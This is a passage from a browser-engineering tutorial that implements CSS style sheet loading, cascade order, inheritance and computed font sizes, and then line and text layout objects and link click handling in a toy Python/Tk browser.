error-handling code always increases i
. Each parsing
function (except whitespace
) should always increment
i
.
You can also add a print
statement to the start and
end of each parsing function with the name of the parsing function, the
index i
, and the parsed data. It’s a lot of output, but
it’s a sure-fire way to find really complicated bugs. (If you print an
open parenthesis at the start of the function and a close parenthesis at
the end, you can use your editor’s “jump to other parenthesis” feature
to skip through output quickly. If you also add the right number of
spaces to each line, it’ll be a lot easier to read; don’t neglect
debugging niceties like this! It can be especially helpful to print,
say, the 20 characters around index i
from the string.)
A parser receives arbitrary bytes as input, so parser bugs are usually easy for bad actors to exploit. Parser correctness is thus crucial to browser security, as many parser bugs have demonstrated. Nowadays browser developers use fuzzing to try to find and fix such bugs.
With the parser debugged, the next step is applying the parsed style sheet to the web page. Since each CSS rule can style many elements on the page, this will require looping over all elements and all rules. When a rule applies, its property/values pairs are copied to the element’s style information:
def style(node, rules):
    # ...
    for selector, body in rules:
        if not selector.matches(node): continue
        for property, value in body.items():
            node.style[property] = value
Make sure to put this loop before the one that parses the
style
attribute: the style
attribute should
override style sheet values.
To try this out, we’ll need a style sheet. Every browser ships with a browser style sheet (technically called a “User Agent” style sheet; User Agent, like the Memex), which defines its default styling for the various HTML elements. For our browser, it might look like this:
pre { background-color: gray; }
Let’s store that in a new file, browser.css
, and have
our browser read it when it starts:
class Browser:
    def __init__(self):
        # ...
        with open("browser.css") as f:
            self.default_style_sheet = CSSParser(f.read()).parse()
Now, when the browser loads a web page, it can apply that default style sheet to set up its default styling for each element:
    def load(self, url):
        # ...
        rules = self.default_style_sheet.copy()
        style(self.nodes, rules)
        # ...
The browser style sheet is the default for the whole web. But each
web site can also use CSS to set a consistent style for the whole site,
by referencing CSS files using link
elements:
<link rel="stylesheet" href="/main.css">
The mandatory rel
attribute identifies this link as a
style sheet, and the href
attribute has the style
sheet URL. We need to find all these links, download their style sheets,
and apply them. (For browsers, stylesheet
is the most
important kind of link, but there’s also preload
for
loading assets that a page will use later and icon
for
identifying favicons. Search engines also use these links; for example,
rel=canonical
names the “true name” of a page, and search
engines use it to track pages that appear at multiple URLs.)
Since we’ll be doing similar tasks in the next few chapters, let’s generalize a bit and write a recursive function that turns a tree into a list of nodes:
def tree_to_list(tree, list):
    list.append(tree)
    for child in tree.children:
        tree_to_list(child, list)
    return list
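On a small tree, tree_to_list produces nodes in pre-order, each parent before its children; here with a minimal stand-in node class:

```python
class Node:
    def __init__(self, name, children=None):
        self.name = name
        self.children = children or []

def tree_to_list(tree, list):
    list.append(tree)
    for child in tree.children:
        tree_to_list(child, list)
    return list

tree = Node("html", [Node("head"), Node("body", [Node("p")])])
names = [n.name for n in tree_to_list(tree, [])]
assert names == ["html", "head", "body", "p"]  # pre-order traversal
```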
I’ve written this helper to work on both the HTML and layout trees,
for later. We can use tree_to_list
with a Python list
comprehension (it’s kind of crazy, honestly, that Python lets you write
things like this—crazy, but very convenient!) to grab the URL of each
linked style sheet:
    def load(self, url):
        # ...
        links = [node.attributes["href"]
                 for node in tree_to_list(self.nodes, [])
                 if isinstance(node, Element)
                 and node.tag == "link"
                 and node.attributes.get("rel") == "stylesheet"
                 and "href" in node.attributes]
        # ...
Now, these style sheet URLs are usually not full URLs; they are something called relative URLs. (There are other flavors, including query-relative and scheme-relative URLs, that I’m skipping.)
To download the style sheets, we’ll need to convert each relative URL into a full URL:
class URL:
    def resolve(self, url):
        if "://" in url: return URL(url)
        if not url.startswith("/"):
            dir, _ = self.path.rsplit("/", 1)
            while url.startswith("../"):
                _, url = url.split("/", 1)
                if "/" in dir:
                    dir, _ = dir.rsplit("/", 1)
            url = dir + "/" + url
        return URL(self.scheme + "://" + self.host + \
            ":" + str(self.port) + url)
Note the logic for handling ..
in the relative URL; for
whatever reason, this is handled by the browser, not the server.
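The path arithmetic can be sketched on its own. This hypothetical resolve_path helper mirrors the relative-path logic above, without the URL class around it:

```python
def resolve_path(base_path, url):
    # full and host-relative URLs are handled elsewhere; this sketch
    # covers path-relative URLs, including ".." segments
    if url.startswith("/"): return url
    dir, _ = base_path.rsplit("/", 1)
    while url.startswith("../"):
        _, url = url.split("/", 1)
        if "/" in dir:
            dir, _ = dir.rsplit("/", 1)
    return dir + "/" + url

assert resolve_path("/a/b/page.html", "main.css") == "/a/b/main.css"
assert resolve_path("/a/b/page.html", "../style.css") == "/a/style.css"
assert resolve_path("/a/b/page.html", "/root.css") == "/root.css"
```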
Now the browser can request each linked style sheet and add its rules
to the rules
list:
    def load(self, url):
        # ...
        for link in links:
            try:
                header, body = url.resolve(link).request()
            except:
                continue
            rules.extend(CSSParser(body).parse())
The try
/except
ignores style sheets that
fail to download, but it can also hide bugs in your code, so if
something’s not right try removing it temporarily.
Each browser has its own browser style sheet (Chromium, Safari, Firefox). Reset style sheets are often used to overcome any differences. This works because web page style sheets take precedence over the browser style sheet, just like in our browser, though real browsers fiddle with priorities to make that happen.Our browser style sheet only has tag selectors in it, so just putting them first works well enough. But if the browser style sheet had any descendant selectors, we’d encounter bugs.
A web page can now have any number of style sheets applied to it. And since two rules can apply to the same element, rule order matters: it determines which rules take priority, and when one rule overrides another.
In CSS, the correct order is called cascade order, and it is based on the rule’s selector, with file order as a tie breaker. This system allows more specific rules to override more general ones, so that you can have a browser style sheet, a site-wide style sheet, and maybe a special style sheet for a specific web page, all co-existing.
Since our browser only has tag selectors, our cascade order just counts them:
class TagSelector:
    def __init__(self, tag):
        # ...
        self.priority = 1

class DescendantSelector:
    def __init__(self, ancestor, descendant):
        # ...
        self.priority = ancestor.priority + descendant.priority
Then our cascade order for rules is just those priorities:
def cascade_priority(rule):
    selector, body = rule
    return selector.priority
Now when we call style
, we need to sort the rules, like
this:
    def load(self, url):
        # ...
        style(self.nodes, sorted(rules, key=cascade_priority))
        # ...
Note that before sorting, rules
is in file order. Since
Python’s sorted
function keeps the relative order of
elements when possible, file order thus acts as a tie breaker, as it
should.
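A small self-contained check of that stability (Sel is a minimal stand-in for a selector object):

```python
class Sel:
    def __init__(self, name, priority):
        self.name = name
        self.priority = priority

def cascade_priority(rule):
    selector, body = rule
    return selector.priority

# rules in file order: two tag selectors, then a descendant selector
rules = [(Sel("a", 1), {}), (Sel("article div", 2), {}), (Sel("b", 1), {})]
ordered = sorted(rules, key=cascade_priority)
# sorted is stable: "a" stays before "b" among equal priorities,
# while the higher-priority descendant selector moves to the end
assert [s.name for s, b in ordered] == ["a", "b", "article div"]
```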
That’s it: we’ve added CSS to our web browser! I mean—for background
colors. But there’s more to web design than that. For example, if you’re
changing background colors you might want to change foreground colors as
well—the CSS color
property. But there’s a catch:
color
affects text, and there’s no way to select a text
node. How can that work?
Web pages can also supply alternative style sheets, and some browsers provide (obscure) methods to switch from the default to an alternate style sheet. The CSS standard also allows for user styles that set custom style sheets for websites, with a priority between browser and website-provided style sheets.
The way text styles work in CSS is called inheritance. Inheritance means that if some node doesn’t have a value for a certain property, it uses its parent’s value instead. That includes text nodes. Some properties are inherited and some aren’t; it depends on the property. Background color isn’t inherited, but text color and other font properties are.
Let’s implement inheritance for four font properties:
color
, font-weight
(normal
or
bold
), font-style
(normal
or
italic
), and font-size
(a length or
percentage).
Let’s start by listing our inherited properties and their default values:
INHERITED_PROPERTIES = {
    "font-size": "16px",
    "font-style": "normal",
    "font-weight": "normal",
    "color": "black",
}
We’ll then add the actual inheritance code to the style
function. It has to come before the other loops, since explicit
rules should override inheritance:
def style(node, rules):
    # ...
    for property, default_value in INHERITED_PROPERTIES.items():
        if node.parent:
            node.style[property] = node.parent.style[property]
        else:
            node.style[property] = default_value
    # ...
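Here is inheritance in miniature; Node and the rules dict are simplified stand-ins for the browser’s HTML tree and matched rules:

```python
INHERITED_PROPERTIES = {
    "font-size": "16px",
    "font-style": "normal",
    "font-weight": "normal",
    "color": "black",
}

class Node:
    def __init__(self, tag, parent=None):
        self.tag = tag
        self.parent = parent
        self.children = []
        self.style = {}
        if parent: parent.children.append(self)

def style(node, rules):
    # inherited properties default to the parent's value
    for prop, default in INHERITED_PROPERTIES.items():
        if node.parent:
            node.style[prop] = node.parent.style[prop]
        else:
            node.style[prop] = default
    # explicit rules override inheritance
    node.style.update(rules.get(node.tag, {}))
    for child in node.children:
        style(child, rules)

body = Node("body")
p = Node("p", body)
style(body, {"body": {"color": "red"}})
assert p.style["color"] == "red"       # inherited from <body>
assert p.style["font-size"] == "16px"  # default value
```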
Inheriting font size comes with a twist. Web pages can use
percentages as font sizes: h1 { font-size: 150% }
makes
headings 50% bigger than surrounding text. But what if you had, say, a
code
element inside an h1
tag—would that
inherit the 150%
value for font-size
? Surely
it shouldn’t be another 50% bigger than the rest of the heading
text?
So, in fact, browsers resolve percentages to absolute pixel units
before storing them in style
and before those values are
inherited; the result is called a “computed style”. (Full CSS is a bit
more confusing: there are specified, computed, used, and actual values,
and they affect lots of CSS properties besides font-size
.
We’re just not implementing those other properties in this book.) Of the
properties our toy browser supports, only font-size
needs
to be computed in this way:
def style(node, rules):
    # ...
    if node.style["font-size"].endswith("%"):
        # ...
    for child in node.children:
        style(child, rules)
Resolving percentage sizes has just one tricky edge case: percentage
sizes for the root html
element. In that case the
percentage is relative to the default font size. (This code has to
parse and unparse font sizes because our style
field stores
strings; in a real browser the computed style is stored parsed, so this
doesn’t have to happen.)
def style(node, rules):
    # ...
    if node.style["font-size"].endswith("%"):
        if node.parent:
            parent_font_size = node.parent.style["font-size"]
        else:
            parent_font_size = INHERITED_PROPERTIES["font-size"]
        node_pct = float(node.style["font-size"][:-1]) / 100
        parent_px = float(parent_font_size[:-2])
        node.style["font-size"] = str(node_pct * parent_px) + "px"
Note that this happens after all of the different sources of style
values are handled (so we are working with the final
font-size
value) but before we recurse (so children can
assume our font-size
has been resolved to a pixel
value).
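As a worked example of this computed-style rule (a sketch using a standalone helper rather than the style function itself):

```python
def resolve_pct(value, parent_px):
    # "150%" relative to the parent's already-resolved pixel size
    return str(float(value[:-1]) / 100 * parent_px) + "px"

# an h1 at font-size: 150% of the 16px default is 24px...
h1_size = resolve_pct("150%", 16.0)
assert h1_size == "24.0px"
# ...and a code element at 100% inside it stays at 24px, not
# another 50% bigger, because the percentage was resolved first
code_size = resolve_pct("100%", float(h1_size[:-2]))
assert code_size == "24.0px"
```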
Styling a page can be slow, so real browsers apply tricks like bloom filters for descendant selectors, indices for simple selectors, and various forms of sharing and parallelism. Some types of sharing are also important to reduce memory usage—computed style sheets can be huge!
So now with all these font properties implemented, let’s change layout to use them! That will let us move our default text styles to the browser style sheet:
a { color: blue; }
i { font-style: italic; }
b { font-weight: bold; }
small { font-size: 90%; }
big { font-size: 110%; }
The browser looks up font information in BlockLayout
’s
word
method; we’ll need to change it to use the node’s
style
field, and for that, we’ll need to pass in the node
itself:
class BlockLayout:
    def recurse(self, node):
        if isinstance(node, Text):
            for word in node.text.split():
                self.word(node, word)
        else:
            # ...

    def word(self, node, word):
        font = self.get_font(node)
        # ...
Here, the get_font
method is a simple wrapper around our
font cache:
class BlockLayout:
    def get_font(self, node):
        weight = node.style["font-weight"]
        style = node.style["font-style"]
        if style == "normal": style = "roman"
        size = int(float(node.style["font-size"][:-2]) * .75)
        return get_font(size, weight, style)
Note that for font-style
we need to translate CSS
“normal” to Tk “roman” and for font-size
we need to convert
CSS pixels to Tk points.
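The size conversion itself is simple arithmetic; here is a standalone sketch of that step (px_to_pt is a hypothetical helper, not a browser method):

```python
def px_to_pt(css_size):
    # CSS defines 1px = 0.75pt, and Tk fonts take point sizes
    return int(float(css_size[:-2]) * .75)

assert px_to_pt("16px") == 12   # the default 16px becomes 12pt
assert px_to_pt("24.0px") == 18
```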
Text color requires a bit more plumbing. First, we have to read the
color and store it in the current line
:
    def word(self, node, word):
        color = node.style["color"]
        # ...
        self.line.append((self.cursor_x, word, font, color))
        # ...
The flush
method then copies it from line
to display_list
:
    def flush(self):
        # ...
        metrics = [font.metrics() for x, word, font, color in self.line]
        # ...
        for x, word, font, color in self.line:
            # ...
            self.display_list.append((x, y, word, font, color))
        # ...
That display_list
is converted to drawing commands in
paint
:
    def paint(self, display_list):
        # ...
        for x, y, word, font, color in self.display_list:
            display_list.append(DrawText(
                self.x + x, self.y + y, word, font, color))
DrawText
now needs a color
argument, and
needs to pass it to create_text
’s fill
parameter:
class DrawText:
    def __init__(self, x1, y1, text, font, color):
        # ...
        self.color = color

    def execute(self, scroll, canvas):
        canvas.create_text(
            # ...
            fill=self.color,
        )
Phew! That was a lot of coordinated changes, so test everything and
make sure it works. You should now see links on this page appear in
blue—and you might also notice that the rest of the text has become
slightly lighter. (The book’s main body text is colored
#333
, or roughly 97% black after gamma correction.) Also,
now that we’re explicitly setting the text color, we should explicitly
set the background color as well. (My Linux machine sets the default
background color to a light gray, while my macOS laptop has a “Dark
Mode” where the default background color becomes a dark gray. Setting
the background color explicitly avoids the browser looking strange in
these situations.)
class Browser:
    def __init__(self):
        # ...
        self.canvas = tkinter.Canvas(
            # ...
            bg="white",
        )
        # ...
These changes obsolete all the code in BlockLayout
that
handles specific tags, like the style
, weight
,
and size
properties and the open_tag
and
close_tag
methods. Let’s refactor a bit to get rid of
them:
    def recurse(self, node):
        if isinstance(node, Text):
            for word in node.text.split():
                self.word(node, word)
        else:
            if node.tag == "br":
                self.flush()
            for child in node.children:
                self.recurse(child)
Styling not only lets web page authors style their own web pages; it also moves browser code to a simple style sheet. And that’s a big improvement: the style sheet is simpler and easier to edit. Sometimes converting code to data like this means maintaining a new format, but browsers get to reuse a format, CSS, they need to support anyway.
Usually a point is one 72nd of an inch while pixel size depends on the screen, but CSS instead defines an inch as 96 pixels, because that was once a common screen resolution. And these CSS pixels need not be physical pixels! Seem weird? OS internals are equally bizarre, let alone traditional typesetting.
This chapter implemented a rudimentary but complete styling engine,
including downloading, parsing, matching, sorting, and applying CSS
files. That means we parsed both style
attributes and
link
ed CSS files, and refactored
BlockLayout
to move the font properties to CSS. Our styling
engine is also relatively easy to extend with new properties and
selectors.
The complete set of functions, classes, and methods in our browser should now look something like this:
class URL:
def __init__(url)
def request()
def resolve(url)
WIDTH
HEIGHT
FONTS
def get_font(size, weight, slant)
class Text:
def __init__(text, parent)
def __repr__()
class Element:
def __init__(tag, attributes, parent)
def __repr__()
def print_tree(node, indent)
class HTMLParser:
def __init__(body)
def parse()
def get_attributes(text)
def add_text(text)
SELF_CLOSING_TAGS
def add_tag(tag)
HEAD_TAGS
def implicit_tags(tag)
def finish()
BLOCK_ELEMENTS
class DrawRect:
def __init__(x1, y1, x2, y2, color)
def execute(scroll, canvas)
def __repr__()
class DrawText:
def __init__(x1, y1, text, font, color)
def execute(scroll, canvas)
def __repr__()
class BlockLayout:
def __init__(node, parent, previous)
def token(tok)
def word(node, word)
def flush()
def recurse(node)
def open_tag(tag)
def close_tag(tag)
def layout()
def layout_mode()
def paint(display_list)
def get_font(node)
def __repr__()
class DocumentLayout:
def __init__(node)
def layout()
def paint(display_list)
def __repr__()
class Browser:
def __init__()
def load(url)
def draw()
def scrolldown(e)
def tree_to_list(tree, list)
class CSSParser:
def __init__(s)
def whitespace()
def literal(literal)
def word()
def pair()
def ignore_until(chars)
def body()
def selector()
def parse()
class TagSelector:
def __init__(tag)
def matches(node)
def __repr__()
class DescendantSelector:
def __init__(ancestor, descendant)
def matches(node)
def __repr__()
INHERITED_PROPERTIES
def style(node, rules)
def cascade_priority(rule)
if __name__ == "__main__"
Fonts: Implement the font-family
property, an
inheritable property that names which font should be used in an element.
Make text inside <code>
elements use a nice
monospaced font like Courier
. Beware the font cache.
Width/Height: Add support to block layout objects for the
width
and height
properties. These can either
be a pixel value, which directly sets the width or height of the layout
object, or the word auto
, in which case the existing layout
algorithm is used.
Class Selectors: Any HTML element can have a
class
attribute, whose value is a space-separated list of
that element’s classes. A CSS class selector, like .main
,
affects all elements with the main
class. Implement class
selectors; give them priority 10. If you’ve implemented them correctly,
the code blocks in this book should be syntax-highlighted.
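One way to start this exercise is sketched below; it is not the full solution, since it doesn't yet hook into CSSParser. The Element stand-in mimics just enough of the book's Element class to demonstrate matching:

```python
class Element:
    # minimal stand-in for the book's Element class, just enough to test
    def __init__(self, tag, attributes):
        self.tag = tag
        self.attributes = attributes

class ClassSelector:
    def __init__(self, cls):
        self.cls = cls
        self.priority = 10  # the priority the exercise specifies

    def matches(self, node):
        if not isinstance(node, Element): return False
        # the class attribute is a space-separated list of class names
        return self.cls in node.attributes.get("class", "").split()

node = Element("div", {"class": "main wide"})
print(ClassSelector("main").matches(node))   # True
print(ClassSelector("other").matches(node))  # False
```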
Display: Right now, the layout_mode
function
relies on a hard-coded list of block elements. In a real browser, the
display
property controls this. Implement
display
with a default value of inline
, and
move the list of block elements to the browser style sheet.
Shorthand Properties: CSS “shorthand properties” set
multiple related CSS properties at the same time; for example,
font: italic bold 100% Times
sets the
font-style
, font-weight
,
font-size
, and font-family
properties all at
once. Add shorthand properties to your parser. (If you haven’t
implemented font-family
, just ignore that part.)
Fast Descendant Selectors: Right now, matching a selector
like div div div div div
can take a long time—it’s
O(nd) in the worst case, where n is the length of the
selector and d is the depth of the layout tree. Modify the
descendant-selector matching code to run in O(n) time. It may
help to have DescendantSelector
store a list of base
selectors instead of just two.
Selector Sequences: Sometimes you want to select an element
by tag and class. You do this by concatenating the selectors
without anything in between.Not even whitespace! For example,
span.announce
selects elements that match both
span
and .announce
. Implement a new
SelectorSequence
class to represent these and modify the
parser to parse them. Sum priorities.Priorities for SelectorSequence
s are supposed
to compare the number of ID, class, and tag selectors in lexicographic
order, but summing the priorities of the selectors in the sequence will
work fine as long as no one strings more than 16 selectors
together.
Important: a CSS property-value pair can be marked
“important” using the !important
syntax, like this:
#banner a { color: black !important; }
This gives that property-value pair (but not other pairs in the same
block!) a higher priority than any selector (except for other
!important
declarations). Parse and implement
!important
, giving any property-value pairs marked this way
a priority 10000 higher than normal property-value pairs.
Ancestor Selectors: An ancestor selector is the inverse of a
descendant selector—it styles an ancestor according to the presence of a
descendant. This feature is one of the benefits provided by the :has
syntax. Try to implement ancestor selectors. As I write this, no
browser has actually implemented :has
; why do you think
that is? Hint: analyze the asymptotic speed of your implementation.
There is a clever implementation that is O(1) amortized per
element—can you find it?No, this clever implementation is still not fast enough for
real browsers to implement.
Inline Style Sheets: The link rel=stylesheet
syntax allows importing an external style sheet (meaning one loaded via
its own HTTP request). There is also a way to provide a style sheet
inline, as part of the HTML, via the <style>
tag—everything up to the following </style>
tag is
interpreted as a style sheet.Inline style sheets should apply after all external style
sheets in the cascade, and apply in order of their position in the
HTML. Inline style sheets are useful for creating
self-contained example web pages, but more importantly are a way that
web sites can load faster by reducing the number of round-trip network
requests to the server. Since style sheets typically don’t contain left
angle brackets, you can implement this feature without modifying the
HTML parser.
Our toy browser is still missing the key insight of hypertext: documents linked together by hyperlinks. It lets us watch the waves, but not surf the web. So in this chapter, we’ll implement hyperlinks, an address bar, and the rest of the browser interface—the part of the browser that decides which page we are looking at.
The core of the web is the link, so the most important part of the browser interface is clicking on links. But before we can quite get to clicking on links, we first need to answer a more fundamental question: where on the screen are the links? Though paragraphs and headings have their sizes and positions recorded in the layout tree, formatted text (like links) does not. We need to fix that.
The big idea is to introduce two new types of layout objects:
LineLayout
and TextLayout
.
BlockLayout
will now have LineLayout
children
for each line of text, which themselves will contain a
TextLayout
for each word in that line. These new classes
can make the layout tree look different from the HTML tree. So to avoid
surprises, let’s look at a simple example:
<html>
  <body>
    Here is some text that is<br>
    spread across multiple lines
  </body>
</html>
The text in the body
element wraps across two lines
(because of the br
element), so the layout tree will have
this structure:
DocumentLayout
  BlockLayout[block] (html element)
    BlockLayout[inline] (body element)
      LineLayout (first line of text)
        TextLayout ("Here")
        TextLayout ("is")
        TextLayout ("some")
        TextLayout ("text")
        TextLayout ("that")
        TextLayout ("is")
      LineLayout (second line of text)
        TextLayout ("spread")
        TextLayout ("across")
        TextLayout ("multiple")
        TextLayout ("lines")
Note how one body
element corresponds to two
LineLayout
s, and how two text nodes turn into a total of
ten TextLayout
s!
Let’s get started. Defining LineLayout
is
straightforward:
class LineLayout:
    def __init__(self, node, parent, previous):
        self.node = node
        self.parent = parent
        self.previous = previous
        self.children = []
TextLayout
is only a little more tricky. A single
TextLayout
refers not to a whole HTML node but to a
specific word. That means TextLayout
needs an extra
argument to know which word that is:
class TextLayout:
    def __init__(self, node, word, parent, previous):
        self.node = node
        self.word = word
        self.children = []
        self.parent = parent
        self.previous = previous
Like the other layout modes, LineLayout
and
TextLayout
will need their own layout
and
paint
methods, but before we get to those we need to think
about how the LineLayout
and TextLayout
objects will be created. That happens during word wrapping.
Let’s review how word wrapping works right
now. BlockLayout
is responsible for word wrapping, inside
its text
method. That method updates a line
field, which stores all the words in the current line. When it’s time to
go to the next line, it calls flush
, which computes the
location of the line and each word in it, and adds all the words to a
display_list
field, which stores all the words in the whole
inline element.
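The wrapping loop is easier to see with concrete numbers. Here's a toy version of that word-wrapping logic, with a made-up fixed-width font of 8 pixels per character standing in for real font metrics:

```python
# Toy word wrapping: split text into lines of words, assuming every
# character is char_w pixels wide (a stand-in for font.measure).
def wrap(text, width, char_w=8):
    lines = [[]]
    cursor_x = 0
    for word in text.split():
        w = len(word) * char_w
        if cursor_x + w > width:   # word doesn't fit: start a new line
            lines.append([])
            cursor_x = 0
        lines[-1].append(word)
        cursor_x += w + char_w     # advance past the word and one space
    return lines

for line in wrap("Here is some text that is spread across multiple lines", 160):
    print(" ".join(line))
```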
Inside the text
method, this key line adds a word to the
current line of text:
self.line.append((self.cursor_x, word, font, color))
We now want to create a TextLayout
object and add it to
a LineLayout
object. The LineLayout
s are
children of the BlockLayout
, so the current line can be
found at the end of the children
array:
line = self.children[-1]
text = TextLayout(node, word, line, self.previous_word)
line.children.append(text)
self.previous_word = text
Note that I needed a new field here, previous_word
, to
keep track of the previous word in the current line. So we’ll need to
initialize it later.
Now let’s think about what happens when we reach the end of the line.
The current code calls flush
, which does stuff like
positioning text and clearing the line
field. We don’t want
to do all that—we just want to create a new LineLayout
object. So let’s use a different method for that:
if self.cursor_x + w > self.width:
    self.new_line()
This new_line
method just creates a new line and resets
some fields:
def new_line(self):
    self.previous_word = None
    self.cursor_x = 0
    last_line = self.children[-1] if self.children else None
    new_line = LineLayout(self.node, self, last_line)
    self.children.append(new_line)
Now there’s a lot of fields we’re not using. Let’s clean them up. In
the core layout
method, we don’t need to initialize the
display_list
or cursor_y
or line
fields, since we won’t be using any of those any more. Instead, we just
need to call new_line
and recurse
:
def layout(self):
    # ...
    else:
        self.new_line()
        self.recurse(self.node)
The layout
method already recurses into its children to
lay them out, so that part doesn’t need any change. And moreover, we can
now compute the height of a paragraph of text by summing the height of
its lines, so this part of the code no longer needs to be different
depending on the layout mode:
def layout(self):
    # ...
    self.height = sum([child.height for child in self.children])
With the display_list
gone, we can also remove the part
of paint
that handles it. Painting all the lines in a
paragraph is now just automatically handled by recursing into the child
layout objects. So by adding LineLayout
and
TextLayout
we made BlockLayout
quite a bit
simpler and shared more code between block and inline layout modes.
You might also be tempted to delete the flush
method,
since it’s no longer called from anywhere. But keep it around for just a
moment—we’ll need it to write the layout
method for line
and text objects.
The layout objects generated by a text node need not even be consecutive. English containing a Farsi quotation, for example, can flip from left-to-right to right-to-left in the middle of a line. The text layout objects end up in a surprising order. And then there are languages laid out vertically…
We’re now creating line and text objects, but we still need to lay
them out. Let’s start with lines. Lines stack vertically and take up
their parent’s full width, so computing x
and
y
and width
looks the same as for our other
boxes:You could reduce
the duplication with some helper methods (or even something more
elaborate, like mixin classes), but in a real browser different layout
modes support different kinds of extra features (like text direction or
margins) and the code looks quite different.
class LineLayout:
    def layout(self):
        self.width = self.parent.width
        self.x = self.parent.x
        if self.previous:
            self.y = self.previous.y + self.previous.height
        else:
            self.y = self.parent.y
# ...
Computing height, though, is different—this is where all that logic
to compute maximum ascents, maximum descents, and so on comes in.
We’ll want to pilfer that code from the old flush
method. First, let’s lay out each word:
# ...
for word in self.children:
    word.layout()
Next, we need to compute the line’s baseline based on the maximum
ascent and descent, using basically the same code as the old
flush
method:
# ...
max_ascent = max([word.font.metrics("ascent")
    for word in self.children])
baseline = self.y + 1.25 * max_ascent
for word in self.children:
    word.y = baseline - word.font.metrics("ascent")
max_descent = max([word.font.metrics("descent")
    for word in self.children])
Note that this code is reading from a font
field on each
word and writing to each word’s y
field.The y
position
could have been computed in TextLayout
’s
layout
method—but then that layout method would have to
come after the baseline computation, not before. Yet
font
must be computed before the baseline
computation. A real browser might resolve this paradox with multi-phase
layout. There are many considerations and optimizations of this kind
that are needed to make text layout super fast. That means
that inside TextLayout
’s layout
method, we
need to compute x
, width
, and
height
, but also font
, and not y
.
Remember that for later.
Finally, since each line is now a standalone layout object, it needs to have a height. We compute it from the maximum ascent and descent:
# ...
self.height = 1.25 * (max_ascent + max_descent)
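To make the baseline arithmetic concrete, here it is run on made-up ascent and descent values, with plain numbers standing in for Tk font metrics:

```python
# Two words on one line, with hypothetical font metrics in pixels.
words = [
    {"ascent": 16, "descent": 4},
    {"ascent": 20, "descent": 5},
]
y = 100  # the line's y position (assumed)

max_ascent = max(w["ascent"] for w in words)       # 20
baseline = y + 1.25 * max_ascent                   # 125.0
word_ys = [baseline - w["ascent"] for w in words]  # tops: [109.0, 105.0]
max_descent = max(w["descent"] for w in words)     # 5
height = 1.25 * (max_ascent + max_descent)         # 31.25

print(baseline, word_ys, height)
```

The 1.25 factor adds the same 25% leading above and below the line as the old flush method did.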
Ok, so that’s line layout. Now let’s think about laying out each
word. Recall that there’s a few quirks here: we need to compute a
font
field for each TextLayout
, but we do not
need to compute a y
field.
We can compute font
using the same font-construction
code as in BlockLayout
:
class TextLayout:
    def layout(self):
        weight = self.node.style["font-weight"]
        style = self.node.style["font-style"]
        if style == "normal": style = "roman"
        size = int(float(self.node.style["font-size"][:-2]) * .75)
        self.font = get_font(size, weight, style)
Next, we need to compute the word’s size and x
position. We
use the font metrics to compute size, and stack words left to right to
compute position.
class TextLayout:
    def layout(self):
        # ...
        # Do not set self.y!!!
        self.width = self.font.measure(self.word)
        if self.previous:
            space = self.previous.font.measure(" ")
            self.x = self.previous.x + space + self.previous.width
        else:
            self.x = self.parent.x
        self.height = self.font.metrics("linespace")
So that’s layout
for LineLayout
and
TextLayout
. All that’s left is painting. For
LineLayout
we just recurse:
class LineLayout:
    def paint(self, display_list):
        for child in self.children:
            child.paint(display_list)
And each TextLayout
creates a single
DrawText
call:
class TextLayout:
    def paint(self, display_list):
        color = self.node.style["color"]
        display_list.append(
            DrawText(self.x, self.y, self.word, self.font, color))
So, oof, well, this was quite a bit of refactoring. Take a moment to test everything—it should look exactly identical to how it did before we started this refactor. But while you can’t see it, there’s a crucial difference: each blue link on the page now has an associated layout object and its own size and position.
Actually, text rendering is way more complex than this. Letters can transform and overlap, and the user might want to color certain letters—or parts of letters—a different color. All of this is possible in HTML, and browsers implement support for it.
Now that the browser knows where the links are, we start work on
clicking them. In Tk, clicks work just like key presses: you bind an
event handler to a certain event. For click handling that event is
<Button-1>
, button number 1 being the left button on
the mouse.Button 2 is
the middle button; button 3 is the right-hand button.
class Browser:
    def __init__(self):
        # ...
        self.window.bind("<Button-1>", self.click)
Inside click
, we want to figure out what link the user
has clicked on. Luckily, the event handler is passed an event object,
whose x
and y
fields refer to where the click
happened:
class Browser:
    def click(self, e):
        x, y = e.x, e.y
Now, here, we have to be careful with coordinate systems. Those x and y coordinates are relative to the browser window. Since the canvas is in the top-left corner of the window, those are also the x and y coordinates relative to the canvas. We want the coordinates relative to the web page, so we need to account for scrolling:
class Browser:
    def click(self, e):
        # ...
        y += self.scroll
The next step is to figure out what links or other elements are at that location. To do that, search through the tree of layout objects:
# ...
objs = [obj for obj in tree_to_list(self.document, [])
        if obj.x <= x < obj.x + obj.width
        and obj.y <= y < obj.y + obj.height]
Now, normally when you click on some text, you’re also clicking on
the paragraph it’s in, and the section that that paragraph is in, and so
on. We want the one that’s “on top”, which is the last object in the
list:In a real browser,
sibling elements can also overlap each other, like a dialog that
overlaps some text. Web pages can control which sibling is on top using
the z-index
property. So real browsers have to compute stacking
contexts to resolve what you actually clicked on.
# ...
if not objs: return
elt = objs[-1].node
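This hit-testing logic is worth seeing in isolation. Here's a sketch with hand-made boxes standing in for layout objects; the names and coordinates are invented:

```python
class Box:
    # stand-in for a layout object: just a rectangle with a label
    def __init__(self, x, y, width, height, name):
        self.x, self.y = x, y
        self.width, self.height = width, height
        self.name = name

# Nested boxes, listed outermost first, as tree_to_list would produce.
boxes = [
    Box(0, 0, 800, 600, "body"),
    Box(10, 10, 200, 20, "paragraph"),
    Box(50, 12, 40, 16, "link"),
]

x, y = 60, 20
objs = [b for b in boxes
        if b.x <= x < b.x + b.width
        and b.y <= y < b.y + b.height]
print([b.name for b in objs])  # every box containing the point
print(objs[-1].name)           # the last one is the most specific: "link"
```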
This elt
node is the most specific node that was
clicked. With a link, that’s usually going to be a text node. But since
we want to know the actual URL the user clicked on, we need to climb
back up the HTML tree to find the link element:
# ...
while elt:
    if isinstance(elt, Text):
        pass
    elif elt.tag == "a" and "href" in elt.attributes:
        # ...
    elt = elt.parent
I wrote this in a kind of curious way so it’s easy to add other types of clickable things—like text boxes and buttons—in the next chapter.
Once we find the link element itself, we need to extract the URL and load it:
# ...
elif elt.tag == "a" and "href" in elt.attributes:
    url = self.url.resolve(elt.attributes["href"])
    return self.load(url)
Note that when a link has a relative URL, that URL is resolved
relative to the current page, so store the current URL in
load
:
class Browser:
    def __init__(self):
        # ...
        self.url = None

    def load(self, url):
        self.url = url
        # ...
Try it out! You should now be able to click on links and navigate to new web pages.
On mobile devices, a “click” happens over an area, not just at a single point. Since mobile “taps” are often pretty inaccurate, click should use the area information for “hit testing”. This can happen even with a normal mouse click when the click is on a rotated or scaled element.
